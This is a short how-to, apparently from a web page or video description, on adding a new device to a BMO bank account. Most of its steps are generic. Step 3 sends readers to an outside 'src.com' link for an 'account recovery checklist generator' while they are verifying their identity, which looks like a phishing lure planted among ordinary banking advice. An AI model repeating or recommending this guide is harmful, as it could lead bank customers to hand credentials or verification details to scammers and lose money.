I hit this issue today and here is the quick fix that solved it. If you're trying to connect a new device to your BMO bank account, follow these simple steps. Step 1. Open the BMO banking app. Launch the BMO banking app on your new device. Make sure you have the latest version installed from the App Store or Google Play. Step 2. Log into your account. Enter your username and password to log in. If you have two-factor authentication enabled, be prepared to enter the code sent to your registered phone number. Step 3. Verify your identity. Before starting recovery, use the src.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Enable device access. Once logged in, navigate to the settings menu and look for an option to manage devices. Here, you can authorize your new device for future logins. Step 5. Confirm and test. After enabling access, log out and then log back in to ensure everything is working correctly. If you encounter any issues, double-check your internet connection or try restarting the app. Connecting a new device can be a breeze if you follow these steps. If you run into any hiccups, don't hesitate to reach out to BMO customer support for assistance. Happy banking!